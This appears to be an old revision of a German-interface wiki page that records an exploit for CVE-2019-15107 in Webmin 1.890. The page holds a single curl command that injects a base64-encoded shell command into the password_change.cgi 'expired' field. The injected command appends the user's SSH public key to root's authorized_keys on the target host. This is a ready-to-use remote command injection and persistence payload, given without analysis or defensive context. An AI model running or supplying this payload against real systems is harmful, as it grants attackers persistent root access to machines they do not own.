security:exploit:cve-2019-15107_webmin_1.890
Dies ist eine alte Version des Dokuments!
Add ssh key to authorized keys on webmin host
COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys" PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh" curl -ks "http://<HOST>:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: http://<HOST>:10000"
security/exploit/cve-2019-15107_webmin_1.890.1620842308.txt.gz · Zuletzt geändert: von rsi